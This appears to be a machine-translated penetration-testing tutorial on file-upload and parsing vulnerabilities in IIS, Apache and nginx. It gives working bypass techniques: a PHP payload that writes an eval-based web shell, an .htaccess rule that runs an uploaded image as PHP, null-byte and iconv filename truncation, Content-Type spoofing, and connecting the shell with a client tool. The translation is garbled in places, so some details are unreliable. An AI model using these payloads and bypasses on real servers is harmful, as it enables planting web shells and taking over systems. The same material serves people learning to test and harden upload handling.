1.2 File Upload Parsing vulnerability

on file parsing and uploading vulnerability

file Parsing VulnerabilityThe main reason is that some special files have been exploited by IIS, Apache, Nginx and other services to interpret the script file format and execute it in some cases. IIS 5.x/6.0 Parsing Vulnerabilityiis6.0 The following three main parsing vulnerabilities:??1. Directory Parsing Vulnerability/xx.asp/xx.jpg?? Create a folder under the site named. asp,. ASA, and any file extension within its directory is parsed and executed by IIS as an ASP file. So as long as an attacker can upload a picture horse directly through the vulnerability, and can not need to change the suffix name! 2. File parsing xx.asp;. JPG?? Under iis6.0, the semicolon is not parsed, so xx.asp;. JPG is parsed for ASP script execution. 3. File type resolution ASA/CER/CDXiis6.0 The default executable file includes these three ASA, CER, CDX in addition to ASP. Apache Parsing VulnerabilityApache parsing of files is mainly from right to left to judge and parse, if judged as unresolved type, then continue to the left to parse, such as xx.php.wer.xxxxx will be resolved to PHP type. IIS 7.0/nginx <8.03 Malformed Parsing Vulnerabilityin the default fast-cgi on the upload name xx.jpg, the content is:<? PHP fputs (fopen (' shell.php ', ' W '), ' <?php eval ($_post[cmd])?> ');? >then visit xx.jpg/.php, in this directory will generate a sentence Trojan shell.php.

nginx<8.03 null-byte code execution vulnerability

Nginx The following version: 0.5. , 0.6. , 0.7 <= 0.7.65, 0.8 <= 0.8.37 when using php-fastcgi to execute PHP, the URL in the encounter%00 empty bytes when the fastcgi processing inconsistent, Causes the code to be executed in the image by embedding PHP code and then accessing xxx.jpg%00.php. ?? Another nginx file vulnerability is from left to right parsing, can bypass the suffix name restrictions, but also can upload Trojan files, so you can upload XXX.jpg.php (may be luck, it may be the problem of the code itself, but in the other can not be successful under the conditions to try). as follows:Content-disposition:form-data, name= "Userfiles"; filename= "XXX.jpg.php"htaccess file analysis if Apache. htaccess can be executed and can be uploaded, then you can try writing in. htaccess: <filesmatch "Shell.jpg" > SetHandler application/x-httpd-php </FilesMatch>then upload shell.jpg trojan, so that the shell.jpg can be parsed into PHP files. Operating System resolution?? because Windows will be the suffix of the file to filter the spaces and points, if you encounter a blacklist check, such as restrictions do not allow uploading PHP files, and the system is a Windows system, then we can upload xx.php, Or xx.php., this way you can bypass the blacklist test file upload! File Upload Vulnerability File Header Spoofing Vulnerability in a word trojan before adding gif89a, and then save the Trojan as a picture format, you can cheat simple WAF. FilePath Vulnerability FilePath vulnerability is mainly used to break through the server automatic naming rules, mainly has the following two ways to use: 1, change the file upload path (filepath), can be combined with directory Parsing vulnerability, path/x.asp/ ?? 2, directly change the file name (all in filepath under the modification), the path/x.asp;.%00 truncationtwo ways to use%00 truncation:?? 1, change the filename,xx.php. jpg, in burpsuit the space corresponding to the hex 20 to XX?? 2, change the filename,xx.php%00.jpg, Burpsuit%00 in the right-click conversion-url-urldecoderfiletype Vulnerabilityfiletype vulnerability is mainly for the Content-type field, there are two main ways to use:?? 1. Upload a picture first, then change the content-type:images/jpeg to content-type:text/asp, then filename is truncated to 00, replacing the contents of the picture with a word trojan. 2, directly use burp grab bag, get post upload data, change Content-type:text/plain to content-type:image/gif 。 iconv function Limit upload?? If one day you upload files found, dare not you upload what file, The uploaded file will automatically add a. jpg suffix, then we can doubt whether the use of iconv this function to upload the limit, at this time we can use a similar 00 truncation method, but this is not 00 truncation, two is 80-ef truncation, that is, we can modify hex 80 to one of the EF to truncate , if you really use this function, then congratulations on uploading any file successfully! If you upload a xx.php, then truncate the packet to change the following space corresponding to the 16 binary to 80 to any of the EF! dual File upload again a file upload place, right-click the review element, first modify the action for the full path, and then copy and paste the upload browse file (<input ... ), so there will be two upload boxes, the first upload normal files, the second choice of a word trojan, and then submit. Reference linkshere is an upload address:Right-view the source code and modify the code at 2:After modification:Save As 1.htmlThe first upload selects the normal JPG picture, the 2nd one chooses our horse,asp filtered here, so I chose CDXsuccessful breakthroughs,Right-View source code

Chopper Connection:   

Form Submit Buttonwe sometimes scan to find the upload path, but there is only one browse file, but there is no submit button, we need to write the submit button at this time. ?? Write the form:?? F12 The review element, add the Submit button code below the Select File form. <input type= "Submit" value= "commit" Name= "XX" >

1.2 File Upload Parsing vulnerability